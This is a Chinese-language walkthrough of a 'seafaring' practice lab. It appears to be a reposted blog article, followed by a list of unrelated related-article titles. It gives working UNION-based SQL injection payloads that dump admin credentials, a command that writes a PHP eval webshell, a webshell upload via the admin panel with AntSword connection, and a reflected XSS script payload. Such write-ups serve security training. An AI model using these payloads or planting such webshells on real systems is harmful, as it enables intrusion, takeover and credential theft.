当前位置: 首页 > news >正文

seafaring靶场漏洞测试攻略

步骤一:打开网页

一:sql注入漏洞

步骤一:测试回显点

-1 union select 1,2,3#

步骤二:查看数据库

-1 union select 1,2,database()#

步骤三:查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

步骤四:查看列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

步骤五:查看账户密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

二:命令执行漏洞

步骤一:页面下方有一个执行框,输入ls查看

步骤二:写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

步骤三:用蚁剑连接

三:文件上传漏洞

步骤一:使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

步骤二:尝试写入一句话木马到2.php中上传

上传成功进行访问

进行蚁剑连接

四:反射型xss漏洞

步骤一:登陆界面输入错误会回显在页面上

步骤二:输入<script>alert(1)</script>,页面弹1

http://www.lryc.cn/news/437539.html

相关文章:

  • 简单示例,搞懂PowerBI的ALL(),ALLEXCEPT()和ALLSELECTED()的区别
  • Collection
  • 19章 泛型
  • 基于python+django+mysql+Nanodet检测模型的水稻虫害检测系统
  • 计算机网络27、28——Linux命令1、2
  • 【Python深度学习】逆强化学习(IRL):通俗揭开学习背后的奥秘
  • Linux:五种IO模型
  • ansible企业实战
  • 面向对象程序设计之模板进阶(C++)
  • 电巢科技携Ecosmos元宇宙产品亮相第25届中国光博会
  • Redis 入门 - 收官
  • Windows技术栈企业基础底座(1)-为基于Windows的Nginx安装证书
  • ThreeJS入门(002):学习思维路径
  • 基于ssm+vue+uniapp的新生报到系统小程序
  • 掌握 JavaScript ES6+:现代编程技巧与模块化实践
  • AttackGen - AI 网络安全事件响应测试工具,附下载链接
  • CAD2020安装方法
  • ubuntu安装mongodb实操学习
  • RabbitMQ 基础入门
  • Unity 特殊文件夹
  • Monster Sound FX Pack 2 怪物恶魔野兽声效包
  • linux常用环境配置
  • SoapShell 更新 | 新增调用cmd执行系统命令
  • Ubuntu查看系统用户信息
  • 入门AI绘画 | 手把手教学Stable Diffusion
  • 基于SpringBoot+Vue+MySQL的热门网络游戏推荐系统
  • SpringBoot + Vue + ElementUI 实现 el-table 分页功能详解
  • 游戏、网关等服务借助Docker容器化并使用Kubernetes部署、更新等
  • Vue面试题4
  • Probabilistic Embeddings for Cross-Modal Retrieval 论文阅读